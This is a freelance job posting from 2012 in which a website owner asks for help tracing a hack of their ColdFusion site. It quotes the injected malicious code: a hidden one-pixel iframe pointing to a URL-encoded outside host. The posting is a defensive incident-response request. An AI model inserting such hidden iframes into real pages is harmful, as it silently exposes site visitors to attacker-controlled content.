Find freelancers. Lose those costly delays.

With 1.7 million freelancers, we'll match you with the perfect talent.

or, Register with Elance »

Cross Site Injection Hack XSS - on ColdFusion application
Sign in to Add to Watch List

IT & Programming > Networking & Security

View Change History

The client has made the following changes to the job.


Job Description

  |  Change History >>


  • Posted: Wed, Aug 22, 2012
  • Time Left: Closed
  • Location: Anywhere
  • Client prefers freelancers from:

    You are still able to submit a proposal for this job.

    The client prefers freelancers from
    a different location.

    You're still able to submit a proposal for this job, regardless of your location.
  • Start: Immediately
  • Budget: Not Sure
  • Fixed Price Job
  • Elance Escrow Protection
  • U.S. freelancers must have W9
Sign in to view client's details

We have a web site that uses Coldfusion 9.++ that has been hacked and they are inserting the following <iframe> command.

<iframe scrolling="no" frameborder="0" src="http://%77%77%77%2E%63%6F%6C%6C%65%67%65%66%75%6E%34%75%2E%63%6F%6D" width="1" height="1"></iframe>

pointing at   [obscured]   into our main index page.

We need help in finding out how they are doing this. We have done a number of things, including making sure that the forms we are using are not outputing the input without checking and modifying it.

Sign in or Register to see more

Job ID: 32939057
Avg $ | High $ | Low $ — Show Pricing
  • Submit Date (Latest)

 Romania  |  
A team of highly skilled and creative developers specialized in providing high technology, end-to-end solutions (requirements gathering, database...
 0.0   |  Private   |  0 Jobs   |  1 verified credential(s)
Bid ID: 33283611  |  Submitted: Sep 5, 2012 06:52 ET 
Proposal SEALED

 United States  |  
*** RANKED TOP 1% ON ELANCE (out of 216,094 individuals) *** I can do anything from Web Development (ColdFusion 6+ years, Javascript, AJAX,...
 0.0   |  Private   |  0 Jobs
Bid ID: 33006077  |  Submitted: Aug 25, 2012 11:31 ET 
Proposal SEALED

 United States  |  
The most trusted security analyst on Elance! I offer world-class incident response, malware cleanup, and other assistance related to hacking /...
 5.0   |  Private   |  382 Jobs   |  4 verified credential(s)
Bid ID: 32940418  |  Submitted: Aug 22, 2012 23:22 ET 
Proposal SEALED
Elance is now an Upwork company.
Upwork is the choise of 4M+ clients. Get started working on Upwork today.
Are you ready to post a job like this one?
Post a Similar Job »